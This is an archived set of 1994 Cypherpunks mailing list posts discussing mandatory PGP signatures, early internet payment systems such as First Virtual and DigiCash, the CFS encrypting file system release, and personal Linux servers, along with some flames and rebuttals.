The 'new improved' commercial version of Mosaic, by those who left to form a company. The freeware version of Netscape is probably the best WWW browser for a number of platforms right now. Of course, PGP wouldn't be integrated with Netscape as such, but into a local Web page - I'm looking at Web pages as simple interfaces to various ordinary, not necessarily 'netted' tasks.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh        "Clean the air! clean the sky! wash the wind!
rishab at dxm.ernet.in     take stone from stone and wash them..."
rishab at arbornet.org
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335  H 34C Saket, New Delhi 110017, INDIA

From anonymous-remailer at shell.portal.com Fri Dec 2 13:04:56 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 2 Dec 94 13:04:56 PST
Subject: VOTE NO!
Message-ID: <199412022104.NAA17526@jobe.shell.portal.com>

On mandatory sigs: I personally don't fathom the idea (as some of you do), I've always perceived PGP(Tm) as something I would use when I really had something sensitive to send a friend, or when I was making a public announcement to a mailing list or newsgroup. But to use it to sign EVERY single piece of mail I send to cypherpunks is asking a lot from me as my setup is very similar to Tim Mays', and I don't want to be singled out because of it!

I think the list should proceed as it has since its formation, and subscribers should just sign their messages as they see fit. I know I'm not posting anything new, but considering the torrential flood of trash that Detweiler posted, it's not that much of a waste. :-)=

Good evening.

From sleas at d.umn.edu Fri Dec 2 13:44:04 1994
From: sleas at d.umn.edu (shawn leas)
Date: Fri, 2 Dec 94 13:44:04 PST
Subject: ERIK HUGHES: EGOTISTICAL PRICK
Message-ID: <199412022147.PAA00699@mwah177sf.d.umn.edu>

-----BEGIN PGP SIGNED MESSAGE-----

shawn leas writes:
> > In article <199412020536.VAA08584 at jobe.shell.portal.com>,
> > wrote:
> > >this is BS!!!! let's find a NEW LIST. a list is a COMMUNITY
> > >PROPERTY. anyone who pulls this kind of prickery, insinuating
> > >they are in the "bully pulpit", deserves
> > >CYPERSPATIAL EXCOMMUNICATION for HIGH TREASON TO THE CYPHERPUNK
> > >CAUSE of TOTAL AUTONOMY FOR THE INDIVIDUAL.
>
> A list is not 'community' property. Just like if you tried to say that
> my money was your community's property (Clinton supporters) I'd probably
> cut your head off. Eric has full rights to go so far as to kick you off
> if he feels fit. Or me, for that matter. Whatever, it's HIS LIST.

I clipped the wrong line and made it look like I was replying to a guy who was replying to the original guy. A public apology is in order, because no one deserves to be associated with the dick who flamed Eric.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From JLICQUIA at mhc.uiuc.edu Fri Dec 2 13:50:09 1994
From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI))
Date: Fri, 2 Dec 94 13:50:09 PST
Subject: Term Emulators (was Re: public accounts / PGP / passphrases)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

> From: Adam Shostack
> Derek wrote:
>
> | It would be nice to integrate PGP into terminal emulators, too, like
> | kermit or seyon or red ryder or whatever, so that you could easily use
> | PGP locally to sign/encrypt things on the remote end. Wishful
> | thinking, I guess...
>
> I think terminal emulators are the wrong layer for PGP
> integration. PGP support is needed in document editors and viewers,
> rather than in network layers.

I think you misunderstood. I took Derek as saying that 'modem programs' (as in the Procomm/Crosstalk kind) should have PGP integration. If these truly provided a full-featured network, then yes, the focus would need to be on the local editors/viewers we'd all use. As it is, these programs only provide a narrow window into a far-off environment, with varying degrees of security.

As a positive proposal, I noticed Greg Broiles's posts with the scripts and came up with an idea. Would it be possibly a step forward to write similar scripts to allow for local agency? I envision two stages here:

1. Scripts on the remote end substituting for your editor that actually run your editor, then ask (once you're done with the plaintext) whether you'd like to process the message locally. If so, it would send the file via sz, wait for a Enter: press, then rz the file back, substituting the rz'd file for the original. You'd still have to mess with files on the local end, though.

2.
Local control of the term emulator to automate the local agency part of the transaction.

> With direct ip connectivity becoming commonplace, we're seeing
> PGP integrated into mail & news tools, which is a great thing. (There
> is also a use for encrypting networks, but I think it is different
> from the use for PGP, which is a document oriented system.)

True. However, the plight of the poor user who must use dial-up to connect is still one where all the agency must happen on the other end of the wire. I don't think these are going to go away any time soon, and by the time they do, we'll probably all have moved on to some new GeeWhizBang system developed commercially (my guess is it'll come out about a year after the RSA patent expires... :-) and integrated via OLE4 into our Windows 5.2 messaging systems (whoops! sorry, Tim, I meant via AppleMindMeld into our System 9.3 messaging systems :-).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From werewolf at io.org Fri Dec 2 13:59:11 1994
From: werewolf at io.org (Mark Terka)
Date: Fri, 2 Dec 94 13:59:11 PST
Subject: First Virtual?
In-Reply-To: <9412022007.AA06523@ch1d157nwk>
Message-ID:

On Fri, 2 Dec 1994, Andrew Lowenstern wrote:

> FV does in fact have a bunch of e-mail addresses that will auto-forward some
> info sheets to you. I have attached the info to this message.
>
> After having read Doug Barnes message (<9412021548.AA17294 at tadpole>) I'm glad
> I'm not the only one who thinks FV is a joke. The entire security of the
> system rests on the difficulty of intercepting and forging e-mail. Forging
> e-mail is dead easy, intercepting isn't much harder.
> While the implementors
> are correct that an online payment-system will have to be simple to use in
> order to gain wide acceptance, sacrificing all security for ease of use is a
> grave mistake. It just begging to be ripped off, providing people actually
> sell something via FV worth ripping off.
>

Ok, so what are our options, given that this company seems to think of security in terms of a plastic padlock. From corresponding posts on the list, the only other alternative, Digicash, doesn't seem to be too responsive to anyone's participation right now.

--------------------------------------------------------------------------
Mark Terka     | werewolf at io.org             | public key (werewolf) by
Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------

From lmccarth at ducie.cs.umass.edu Fri Dec 2 14:27:27 1994
From: lmccarth at ducie.cs.umass.edu (lmccarth at ducie.cs.umass.edu)
Date: Fri, 2 Dec 94 14:27:27 PST
Subject: He's the Big Kahuna
Message-ID: <199412022232.RAA18078@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
> Eric Hughes wrote:
> > Someone else wrote:
> > > I'd feel just about as strange (I hope) if people were saying "Look,
> > > Tim's the boss. He's the Big Kahuna. If you don't like his policies on
> > > his list, leave."
> > "This is one _tasty_ burger"
> Something to do with the metric system?

Security through obscurity.
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From hfinney at shell.portal.com Fri Dec 2 14:27:40 1994
From: hfinney at shell.portal.com (Hal)
Date: Fri, 2 Dec 94 14:27:40 PST
Subject: First Virtual?
In-Reply-To:
Message-ID: <199412022227.OAA00747@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

Mark Terka writes:

>Ok, so what are our options, given that this company seems to think of
>security in terms of a plastic padlock. From corresponding posts on the
>list, the only other alternative, Digicash, doesn't seem to be too
>responsive to anyone's participation right now.

Allow me then to repost this, a summary of how some available payment systems work. It is oriented towards remailers but has info and pointers to several payment systems.

- From owner-cypherpunks at toad.com Sat Oct 29 09:35:38 1994
Date: Sat, 29 Oct 1994 09:31:27 -0700
From: Hal
Message-Id: <199410291631.JAA27105 at jobe.shell.portal.com>
X-To: cypherpunks at toad.com
Subject: Payment systems for remailers

This is an edited version of a posting I made to remailer-operators at c2.org, discussing how some of the various payment systems which have recently been introduced on the net might be used to support a for-pay remailer. First I discussed some motivation, such as improving the quality of service and discouraging spam attacks, then this was the part about the various services.
If anyone knows of other alternatives please let me know.

I know of two systems that are VISA/Mastercard based. One is called First Virtual (http://www.fv.com). They are oriented towards information sales and say that they aren't for service providers, but in practice it looked to me like they could be used for services. When a customer wants to pay, he sends you his FV ID. You send this to FV and they send an email message to the customer asking whether he authorizes the payment. If he says "yes", FV credits your account. You get a check every month. Customers who always say "no" get booted out of the system (as do merchants who submit bogus bills). They charge 29 cents plus 2 percent per transaction, but merchants can batch up multiple orders by a single customer before sending it in.

There are a few problems with a system like this, many of which are somewhat generic to our situation. The most fundamental is that we don't know who our customers are much of the time. In fact, the whole point of the remailer network is that we not know that fact for any case except the first hop in the chain. If we required customers to expose their FV account ID at every hop, it would make it a lot easier to track messages through the network (even if the ID's were hidden in the encryption envelope it seems risky). If we then sent a message to FV saying that we needed to charge ID XXX, and FV responds with an email to the person's home address, this offers more possibilities for tracing.

One solution would be only to charge on entry into the remailer net. Perhaps remailer operators would even charge each other then, and the first remailer would charge some larger amount to deal with a "typical" chain length? Many interesting possibilities here.

Another issue is that the overhead charges by FV would require batching up messages before submitting them. Let me make clear that the batch must consist all of charges to a single user.
It doesn't do any good to send one message to FV asking them to please charge a penny to each of 100 VISA accounts. No, you would have to count messages from each user, separately, and when user XXX had sent, say, $1 worth of messages, you could send in the request to FV and get back 70 or so cents. So this adds some overhead and record-keeping that we don't currently have to do, although perhaps it is not so difficult. But it would raise new questions of authenticating FV ID's, and shares some of the negative privacy impacts and message linking issues mentioned above.

The other VISA based system is called OpenMarket. I just read about it tonight so I don't know it as well (http://www.openmarket.com). It is pretty tied to the WWW so it would not seem to work for us. Customers get connected to a particular WWW server which authenticates them and charges their VISA card appropriately, then they get redirected to the merchant with some kind of token that says they have paid.

The NetBank (email to netbank-intro at agents.com) is a digital-cash like system. Customers get tokens which are basically large secret numbers which have a cash value. They send them to the merchants, and the merchants then send them to the bank which credits their account. The NetBank sends you a check every month.

The interesting thing is how customers buy the cash tokens. One way is by connecting to a 900 number with your modem. They charge the customer $10.00 and give him a digital cash token worth that much. Another way is by faxing a check to them. I wasn't clear on how you get the cash token back in that case; I guess they email it to you at an address you specify. From the privacy point of view, these are not that great; 900 numbers have Automatic Number Identification so unless you are willing to tramp out to a pay phone to get your cash then it could be linked to your phone number. And the fax system must have some kind of return address that would link to you.
The other problem with NetBank is that the smallest denomination which can be spent is 25 cents. Due to the cash-like nature of the tokens, I don't see a natural way to accumulate several messages into one payment. Maybe we could layer our own low-value digital cash system on top of NetBank, where users could buy our anonymous cash for 25 cents and get enough tokens for 25 messages, then we would settle amongst ourselves (or actually with the anon-mail-token bank). Actually this might help with the privacy problems, too. Anonymous digital cash is heavily patented, though.

With a cash-like system, each message would include a numeric token in the header which is the digital cash. The remailer would strip that out and send it in for credit. This is a simple system and could be largely automatic. However there are some tricky issues about cheaters re-using cash.

NetBank charges $4 per month, plus, for the 900-number-based cash, 20% off of face value.

The last system I'll describe is David Chaum's DigiCash (http://www.digicash.com). Chaum is the inventor of digital cash and he certainly knows his stuff, plus as I said he has the intellectual property pretty well sewed up patent-wise.

The DC payment system is also WWW based at present. The customer has to be running a special program on his computer, separate from his web browser. This program holds his digital cash, which is similar conceptually to the NetBank cash but more sophisticated cryptographically. When he wants to buy something, the merchant's web server makes a connection to the customer's DC program, and it transfers the cash to the merchant.

DigiCash says they are planning an email based system but for now their emphasis is on the WWW. Right now they are only in beta and not using real money. I don't know when they will be real and email based, and I don't know if they have said what their commission will be. But when this comes up it may be the best approach if small-value transactions can be supported.
DigiCash is fully anonymous in the sense that once a customer receives the money, it is "blinded" in a special cryptographic way so that the bank cannot associate it with that customer (and no one else can, either). This kind of anonymity fits in very well with our remailer requirements.

Well, I know this is a lot of information to work through, but mostly I want people to be aware of the possibilities. Most of this stuff is very, very new, only weeks old, generally. Probably over the next few months we will see a lot more options appear. I am confident that there will soon be payment systems that would provide the technical basis for fee based remailing. I don't expect anyone to get rich by this, but it might help compensate for the risks we all face, and it might serve to improve the quality of the remailer network.

Hal Finney
hfinney at shell.portal.com

From andrew_loewenstern at il.us.swissbank.com Fri Dec 2 14:32:23 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Fri, 2 Dec 94 14:32:23 PST
Subject: First Virtual?
Message-ID: <9412022231.AA06560@ch1d157nwk>

Mark Terka writes:
> Ok, so what are our options, given that this company seems to think
> of security in terms of a plastic padlock. From corresponding posts
> on the list, the only other alternative, Digicash, doesn't seem to
> be too responsive to anyone's participation right now.

It seems to me that DigiCash mistakenly 'jumped the gun' and announced before they were truly ready to test. This is such a common occurrence in the computer industry that I'm surprised people are making noise over it. However, it indicates their reluctance to ship something before it's ready, which is good considering the technical and political challenges of the task they are undertaking.
How can you really compare the proposed DigiCash systems versus FirstVirtual? One is a 'toy' system for moving credit card numbers around without actually broadcasting them in the clear, the other is a cryptographically secure digital cash type system. It's not surprising that FirstVirtual is ready sooner than DigiCash. However, assuming each system was ready and working as advertised, which would you trust for your financial transactions? With the possibility of millions and billions of dollars of commerce occurring on the net in the near future, which do you think most people will want to use?

While FirstVirtual may have its place in the world of online payment systems, it is IMHO no replacement for a real digital cash system. The fact that most of the people who have even heard of these new payment systems are unaware of the not so subtle differences should alarm most cypherpunks. Digital cash isn't going to happen overnight (although most of us would like it to), and the last thing we want is for systems like FirstVirtual to become the de facto standard for online payment...

andrew

From rfb at lehman.com Fri Dec 2 15:15:14 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Fri, 2 Dec 94 15:15:14 PST
Subject: Mighty morphing power cypherpunks
In-Reply-To: <199412020315.TAA20817@netcom8.netcom.com>
Message-ID: <9412022313.AA09532@cfdevx1.lehman.com>

    From: "James A. Donald"
    Date: Thu, 1 Dec 1994 19:15:35 -0800 (PST)

    So autonag every nym to send a public key in.

Where do you send the autonag message? Do you trust the From: or Reply-To: fields?

Rick

From jamesd at netcom.com Fri Dec 2 15:33:12 1994
From: jamesd at netcom.com (James A. Donald)
Date: Fri, 2 Dec 94 15:33:12 PST
Subject: Mighty morphing power cypherpunks
In-Reply-To: <9412022313.AA09532@cfdevx1.lehman.com>
Message-ID: <199412022333.PAA12885@netcom8.netcom.com>

Rick Busdiecker writes
>
>    From: "James A.
Donald"
>    Date: Thu, 1 Dec 1994 19:15:35 -0800 (PST)
>
>    So autonag every nym to send a public key in.
>
> Where do you send the autonag message? Do you trust the From: or
> Reply-To: fields?

It does not matter who the true identity associated with a public key is.

My proposal is only that signatures be checked for consistent identity, not true name.

Requiring true names would be most uncypherpunk.

So it would be up to the nym to get his true public key to the list, not up to the list to discover the correct public key that signs a posting by a nym.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from the
arbitrary power of the omnipotent state.                jamesd at acm.org

From rfb at lehman.com Fri Dec 2 15:34:08 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Fri, 2 Dec 94 15:34:08 PST
Subject: Why nothing works [Was: Mandatory sig workaround]
In-Reply-To: <199412020330.TAA05366@netcom10.netcom.com>
Message-ID: <9412022332.AA09718@cfdevx1.lehman.com>

    From: "Timothy C. May"
    Date: Thu, 1 Dec 1994 19:30:58 -0800 (PST)

    > 3. Tim: "I don't want to have to download mail for processing. I
    > want to be able to do it all on Netcom's machine."

    A fair summary of the situation. And I consider the slight benefits of signing to not be worth the effort of changing the tools I have managed to get working over the past couple of years.

I think that solution is clear: Buy your own netcom.

You don't need the size, so just buy a 486 and a domain name (cypherpunks.org?). Then, hire a CP hacker to Linuxize the 486, slip/ppp it to some provider, and hook-up premail et al. Anyone selling Linux support contracts yet?

You can continue to do what you currently do on your Mac. You'll just be tcmay at cypherpunks.org instead of tcmay at netcom.com and you'll have some crypto bells and whistles that you didn't have before.
Rick

From mab at research.att.com Fri Dec 2 16:26:58 1994
From: mab at research.att.com (Matt Blaze)
Date: Fri, 2 Dec 94 16:26:58 PST
Subject: New version (1.2) of CFS now available
Message-ID: <9412022305.AA18396@merckx.info.att.com>

Source code for the latest version of CFS (release 1.2), the Cryptographic File System, is now available upon request for research and experimental use in the US and Canada.

CFS pushes encryption services into the Unix(tm) file system. It supports secure storage at the system level through a standard Unix file system interface to encrypted files. Users associate a cryptographic key with the directories they wish to protect. Files in these directories (as well as their pathname components) are transparently encrypted and decrypted with the specified key without further user intervention; cleartext is never stored on a disk or sent to a remote file server. CFS employs a novel combination of DES stream and codebook cipher modes to provide high security with good performance on a modern workstation. CFS can use any available file system for its underlying storage without modification, including remote file servers such as NFS. System management functions, such as file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS. It is implemented entirely at user level, as a local NFS server running on the client machine's "loopback" interface. It consists of about 5000 lines of code and supporting documentation. You must have "root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter '93 USENIX Conference and was more fully detailed in:

    Matt Blaze, "A Cryptographic File System for Unix", Proc. 1st ACM Conference on Computer and Communications Security, Fairfax, VA, November 1993. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfs.ps.)
and in

    Matt Blaze, "Key Management in an Encrypting File System", Proc. Summer '94 USENIX Tech. Conference, Boston, MA, June 1994. (PostScript available by anonymous ftp from research.att.com in the file dist/mab/cfskey.ps.)

The new version differs from the version described in the papers in a few ways:

* The encryption scheme has been strengthened, and now provides greater security but with the online latency of only single-DES.
* Support for the smartcard-based key management system is not included and a few of the tools are not included.
* The performance has been improved.
* The security of the system against certain non-cryptanalytic attacks has been improved somewhat.
* User-contributed ports to a number of additional platforms.
* Hooks for adding new ciphers.
* 3-DES and MacGuffin encryption options.
* Timeout options allow automatic detach of encrypted directories after a set time or period of inactivity.

CFS is being distributed as a research prototype; it is COMPLETELY UNSUPPORTED software. No warranty of any kind is provided. We will not be responsible if the system deletes all your files and emails the cleartext directly to the NSA or your mother. Also, we do not have the resources to port the software to other platforms, although you are welcome to do this yourself. The software was developed under SunOS and BSDI, and there are also unsupported user-contributed ports available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix. We really can't promise to provide any technical support at all, beyond the source code itself. We also maintain a mailing list for CFS users and developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only able to make the software available within the US and Canada to US and Canadian citizens and permanent residents. Unfortunately, we cannot make it available for general anonymous ftp or other uncontrolled access, nor can we allow others to do so.
Sorry.

Legal stuff from the README file:

 * Copyright (c) 1992, 1993, 1994 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls. You may
 * not export it, in whole or in part, or cause or allow such export,
 * through act or omission, without prior authorization from the United
 * States government and written permission from AT&T. In particular,
 * you may not make any part of this software available for general or
 * unrestricted distribution to others, nor may you disclose this software
 * to persons other than citizens and permanent residents of the United
 * States and Canada.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please send email to:

    cfs at research.att.com

DO NOT REPLY DIRECTLY TO THE SENDER OF MESSAGE.

You must include a statement that you are in the US or Canada, are a citizen or legal permanent resident of the US or Canada, and have read and understand the license conditions stated above. Also include an email address in a US or Canada-registered domain. The code will be sent to you via email in a uuencoded compressed tarfile.

From rfb at lehman.com Fri Dec 2 17:04:07 1994
From: rfb at lehman.com (Rick Busdiecker)
Date: Fri, 2 Dec 94 17:04:07 PST
Subject: Mighty morphing power cypherpunks
In-Reply-To: <199412022333.PAA12885@netcom8.netcom.com>
Message-ID: <9412030102.AA11319@cfdevx1.lehman.com>

    From: jamesd at netcom.com (James A.
Donald)
    Date: Fri, 2 Dec 1994 15:33:19 -0800 (PST)

    Rick Busdiecker writes
    >
    >    From: "James A. Donald"
    >    Date: Thu, 1 Dec 1994 19:15:35 -0800 (PST)
    >
    >    So autonag every nym to send a public key in.
    >
    > Where do you send the autonag message? Do you trust the From: or
    > Reply-To: fields?

    It does not matter who the true identity associated with a public key is.

    My proposal is only that signatures be checked for consistent identity, not true name.

Hmmm. I thought that you had also suggested that this mechanism should ``autonag every nym to send a public key in'' which I thought raised the question of ``Where do you send the autonag messages?''

Perhaps you meant for the autonag to be a notice attached to the distributed message?

Rick

From rogaski at phobos.lib.iup.edu Fri Dec 2 17:09:57 1994
From: rogaski at phobos.lib.iup.edu (Mark Rogaski)
Date: Fri, 2 Dec 94 17:09:57 PST
Subject: PGP on a VAX
Message-ID: <199412030109.UAA07622@phobos.lib.iup.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I was wondering what the status of getting PGP compiled on a VAX was. The academic machine here is a VAX 6540 running VMS 5.5-1. Of course I avoid it, but I want to spread the good word amongst the IUP student users. Any place I can get documentation?

- -----
Doc                                 "I used to think that my brain was the
rogaski at phobos.lib.iup.edu        best part of my body ... but then I
http://www.lib.iup.edu/~rogaski/     remembered who was telling me this."
100,000 lemmings can't be wrong!
                                        - Emo Phillips
finger fllevta at oak.grove.iup.edu for PGP Public Key

From shamrock at netcom.com Fri Dec 2 17:38:54 1994
From: shamrock at netcom.com (Lucky Green)
Date: Fri, 2 Dec 94 17:38:54 PST
Subject: Brands excluded from digicash beta
Message-ID:

PAP wrote:

>I just want, in a short message, let you know that there exist some
>satisfied ecash testers (the system itself and the support when we
>set-up our digishop and our plain customers cyberwallets).
> The only thing I could eventually complain about is that I even received
>a second (unsolicited) account Id and password to retrieve ecash
>software because of a bug in the requests management :-)

I have been a beta tester since the days of the very first Ecash clients which would freeze my computer when run ;-) I am very impressed with the latest clients. They work flawlessly. The only thing missing is off-line transfer capability. Since the current beta has a (dimmed) button for this, I don't think we will have to wait much longer.

-- Lucky Green PGP encrypted mail preferred.

From amanda at intercon.com Fri Dec 2 18:04:52 1994
From: amanda at intercon.com (Amanda Walker)
Date: Fri, 2 Dec 94 18:04:52 PST
Subject: The Market for Crypto--A Curmudgeon's View
Message-ID: <9412021425.AA28547@amanda.dial.intercon.com>

> I disagree here -- I've gotten a couple of jobs where my net
> reputation preceded me and was the primary motivator for my getting
> an interview. I was also told at one of them to continue posting as I
> did because they felt that their reputation was enhanced by mine.

Indeed.
Every job I've had since part-time consulting in college has been gotten through the net, and with my electronic presentation and reputation a large factor in getting hired. My official title at InterCon is "Software Engineer / Net Goddess", and among my official responsibilities are to competently and professionally represent myself and my employer on the Internet. The whole reason I'm on cypherpunks, in fact, is because we're ramping up on supporting encryption & authentication in our commercial software, and this is where the ideas are.

> And "cannot make money on the net"? How do you see this? Much as I
> hate the metaphor, I don't make money on the local highways either,
> but they're a part of real life.

It would also be hard to ship things without highways & airports :). This is why the net is an example of infrastructure. InterCon probably makes more money from people who download our demos over the net, or see reviews and recommendations on comp.sys.mac.*, than we do from our traditional printed advertising (and given the quality of a couple of our MacWeek ads, this is a darned good thing :)).

> Just because the reputations aren't digital yet, nor is the cash,
> doesn't mean that the Net isn't real life. It's as real as nearby
> I-94. And a lot more interesting and complex.

I agree. And reputations *are* becoming at least partially digital. I've refused to hire people because I've seen them being twits on the net, and I've hired people (and been hired) because I make a generally good net.impression. It even got my picture in Fortune magazine this spring. If that's not at least a start at a digital reputation, I'm not sure what is.
Amanda Walker
InterCon Systems Corporation

From die at pig.die.com Fri Dec 2 18:59:25 1994
From: die at pig.die.com (Dave Emery)
Date: Fri, 2 Dec 94 18:59:25 PST
Subject: recent voice over data (fwd)
Message-ID: <9412030231.AA01795@pig.die.com>

Forwarded message:

From adam at bwh.harvard.edu Fri Dec 2 19:34:12 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Fri, 2 Dec 94 19:34:12 PST
Subject: First Virtual?
In-Reply-To: <9412022231.AA06560@ch1d157nwk>
Message-ID: <199412030333.WAA29210@bwh.harvard.edu>

-----BEGIN PGP SIGNED MESSAGE-----

I saw a presentation Monday by Nathaniel Borenstein of First Virtual. While I agree that there is a strong need for a good digital cash system, FV is not attempting to fill that niche.

FV is a credit card clearing system for the internet. Its current system is designed for small transactions involving information resources. It is not intended to be used for selling physical objects of value. As such, it forces the merchant to assume risks, in that the buyer has two opportunities to turn down a transaction. (When it is mailed to them, and when the credit card statement arrives.) That second opportunity to decline charges also adds to the security of the system. I won't say its good or perfect, but it does add something.

FV really isn't taking much risk, or making much profit in their $.29+2% transaction fees. FV plans to make its money in other ways. They simply needed a way to collect credit card numbers to make those other ways work. They decided to make that means of payment generally available, and, while hackable, it is better than credit card numbers. (Those who would suggest PGP encryption should take careful note of how much trouble pseudo-mandating signing of posts is creating here.)

The other ways FV plans to make money are providing information services, such as joke of the day.
Others were not mentioned, and in fact, when someone asked, Nathaniel was avoiding the question when I said they'd be providing jotd, at which point he said yep. He was pretty adamant about not talking about vapor.

If you get a chance to hear him, do. It was very interesting, and afterwards, off the record, he might have some interesting things to say.

Adam

| How can you really compare the proposed DigiCash systems versus FirstVirtual?
| One is a 'toy' system for moving credit card numbers around without actually
| broadcasting them in the clear, the other is a cryptographically secure
| digital cash type system. It's not surprising that FirstVirtual is ready
| sooner than DigiCash. However, assuming each system was ready and working as

>I'm glad I'm not the only one who thinks FV is a joke. The entire
>security of the system rests on the difficulty of intercepting and
>forging e-mail. Forging e-mail is dead easy, intercepting isn't much
>harder. While the implementors are correct that an online
>payment-system will have to be simple to use in order to gain wide
>acceptance, sacrificing all security for ease of use is a grave
>mistake. It just begging to be ripped off, providing people actually
>sell something via FV worth ripping off.

From rah at shipwright.com Fri Dec 2 21:29:07 1994
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 2 Dec 94 21:29:07 PST
Subject: Scalability of Ecash System / Article on Internet Cash available.
Message-ID: <199412030528.AAA24023@zork.tiac.net>

At 8:33 AM 12/2/94 -0500, Robert Hettinga wrote:
>Filched from buyinfo, where they've been talking a lot about e$ lately...

Oops. Sorry folks. That's what I get for letting my outbound mail stack up...
Call it a prequel to the Brands excluded thread...

Sorry again. Long story.

Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                     someone who drinks too much and sees
Boston, MA 02331 USA                   snakes." -- Bertrand Russell
(617) 323-7923

From ddt at lsd.com Fri Dec 2 21:40:01 1994
From: ddt at lsd.com (Dave Del Torto)
Date: Fri, 2 Dec 94 21:40:01 PST
Subject: ERIK HUGHES: EGOTISTICAL PRICK
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>Subject: ERIK HUGHES: EGOTISTICAL PRICK

FWIW, I know Eric and can spell his name properly. From the numerous times I've been in his presence, it's my humble opinion that he's about the furthest thing from the bozo described in this flame that I can imagine. Whoever posted this rudeness is cruelly clue-challenged about Eric's character. From the content of his/her attack, this person should really apologize, but from the puerility of it, I doubt the author is mature enough to admit it.

BTW, Eric was and is an early and consistent contributor of quality thinking to this list as far back as I can remember, which is early '92, has donated a lot of time and effort to helping maintain it, and I have no problem with him being photographed or known as a "founder." He's never in any way abused or even preened about it, afaik, and seems appropriately non-egotistical at all times, both in person and in posts.

I'm pretty sick of ad hominem attacks like this on the net, but they usually emanate from sleep-deprived teenagers with no manners who post anonymously, and not from responsible individuals trying to add a voice of humility to an important debate. Laugh it off, Eric, and ignore it (as I know you will).

As for the idea of mandatory signatures: on the surface it's a pain and I don't much like it, but then, it does do an important thing in promoting "verifiable" posts.
I don't post much material to the list (mostly I learn from you guys), and don't find it particularly onerous. Someone who contributes regularly might find it an inconvenience. Lots of things are way more inconvenient, if you ask me (like applying for an FOIA report). I think it might have the positive side-effect of providing an incentive for people to post meaningful information, and not lots of noise to the list (thereby somewhat diminishing the high volume).

What effect does it have on anonymity, though? That could be a serious sticking point: as much as I dislike flames and idiocy from anonymous posters, I will defend their right to post anonymously regardless of how unpleasantly it smells.

dave
____________________________________________
"Even the mad scientists called me crazy!"

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLt/zWaHBOF9KrwDlAQFzfAP+MusVHsSaPVq0jzLvqBCUVf8O+JAFbQXZ
PKNHai6WXNJqECknifZ9GTYg0tccKY4G+xWjED6oLjeK3V1ds7hIaWNUrFg8Ok6r
hH1oPnIMqxY6Iqc0XrgyY+5JnOBVWILA+Iwxy1I0UP+J10Tz8qUY1Q4CL5Ld7yqd
FE7JafKUxOw=
=Yoe9
-----END PGP SIGNATURE-----

From jpb at gate.net Fri Dec 2 21:40:34 1994
From: jpb at gate.net (jpb at gate.net)
Date: Fri, 2 Dec 94 21:40:34 PST
Subject: Why nothing works [Was: Mandatory sig workaround]
In-Reply-To: <9412022332.AA09718@cfdevx1.lehman.com>
Message-ID: <199412030541.AAA14055@seminole.gate.net>

Re:
> You don't need the size, so just buy a 486 and a domain name
> (cypherpunks.org?). Then, hire a CP hacker to Linuxize the 486,
> slip/ppp it to some provider, and hook-up premail et al. Anyone
> selling Linux support contracts yet?
>

Ironically, about 2 hours before I read this message I decided to go that route - I'm going to be doing some consulting (installing a couple PowerMacs and the software on them) and my buddy who is subcontracting the Mac work to me is willing to pay me in trade so I am getting a 486DX-25 with a 120 meg drive hodgepodged out of his spare parts.
I want to run linux on this beast and would like some suggestions from the list - which of the linux CDs do you recommend?

I want to have full network services running on it. I need a minimum of POP3/SMTP (my Duo will be grabbing my mail using StarNine's PT-Inet gateway), a web server, NNTP, ftp, all the good stuff.

I'm completely unfamiliar with linux other than hearing people rave about it. I do have a moderate amount of Unix experience though, as I used to have a BBS running on an AT&T Unix PC and also administered an AT&T 6300 running Xenix. This was all a long time ago though - both machines were brand new and just introduced on the market when I got my hands on them. Since then, I've just been a user, no root access anywhere.

Thanks,

Joe Block
jpb at gate.net

Moderation in temper is always a virtue; moderation in principle is always a vice. -- Thomas Paine

From cdodhner at PrimeNet.Com Fri Dec 2 22:04:15 1994
From: cdodhner at PrimeNet.Com (Christian Odhner)
Date: Fri, 2 Dec 94 22:04:15 PST
Subject: MIT Keysigner CA
In-Reply-To: <9412021926.AA19667@toxicwaste.media.mit.edu>
Message-ID:

On Fri, 2 Dec 1994, Derek Atkins wrote:

> everyone to sign everyone else's key. We plan to make the MIT
